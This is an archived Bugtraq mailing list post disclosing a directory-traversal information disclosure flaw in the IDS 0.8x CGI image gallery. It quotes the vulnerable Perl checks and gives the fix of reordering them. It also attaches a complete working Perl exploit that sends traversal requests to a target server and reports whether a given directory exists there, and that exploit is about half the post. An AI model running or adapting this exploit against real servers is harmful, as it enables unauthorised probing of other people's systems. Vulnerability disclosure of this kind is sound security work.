Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Information Disclosure Vulnerability in IDS 0.8x

From: isox () chainsawbeer com
Date: 28 May 2002 20:21:20 -0000
Hello,

There is a information disclosure vulnerability in IDS 0.8x (assume other versions vulnerable).
IDS is used a cgi based image thumbnail gallery.  When an attacker sends the variable album 
a traversed directory (ie. /../../../../home/foobar) it is possible to tell if the specified 
directory exists by examining the returned error page.  This is possible do to the following 
snippit of code: 


idsShared.pm::getAlbumToDisplay()
=================================
    if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does this album exist?
                bail ("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
    }
    
    if ($albumtodisplay =~ /\.\./) { # hax0r protection...
                bail ("Sorry, invalid directory name: $!");
    }



Attached below is a working exploit for this vulnerability.  The fix is simple, just flip the if 
statements around so it checks for ..'s first.  Also note there is the same type of information 
disclosure vulnerability in index.cgi via the following code (I have just not verified if it is 
exploitable, although is obviously seems as though it is):


index.cgi::processData()
========================
        if ($mode eq 'image') {
            getAlbumToDisplay();
                $imagetodisplay = $query->param('image') || bail ("Sorry, no image name was provided: $!");
                

                unless (-e "albums$albumtodisplay/$imagetodisplay") { # does this album exist?
                        bail ("Sorry, the image \"albums$albumtodisplay/$imagetodisplay\" doesn't exist: $!");
                }
        }
        
        if (($imagetodisplay =~ /\.\./) || ($albumtodisplay =~ /\.\./)) {
                bail ("Directory/image paths must not include \"../\".");
        }




Have a good one,
isox


<--- Begin Exploit Code --->

#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox () chainsawbeer com]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.
#

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;




sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
}


sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed out\n");
  }

  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}

<-- EOF -->
Previous By Date Next
Previous By Thread Next

Current thread: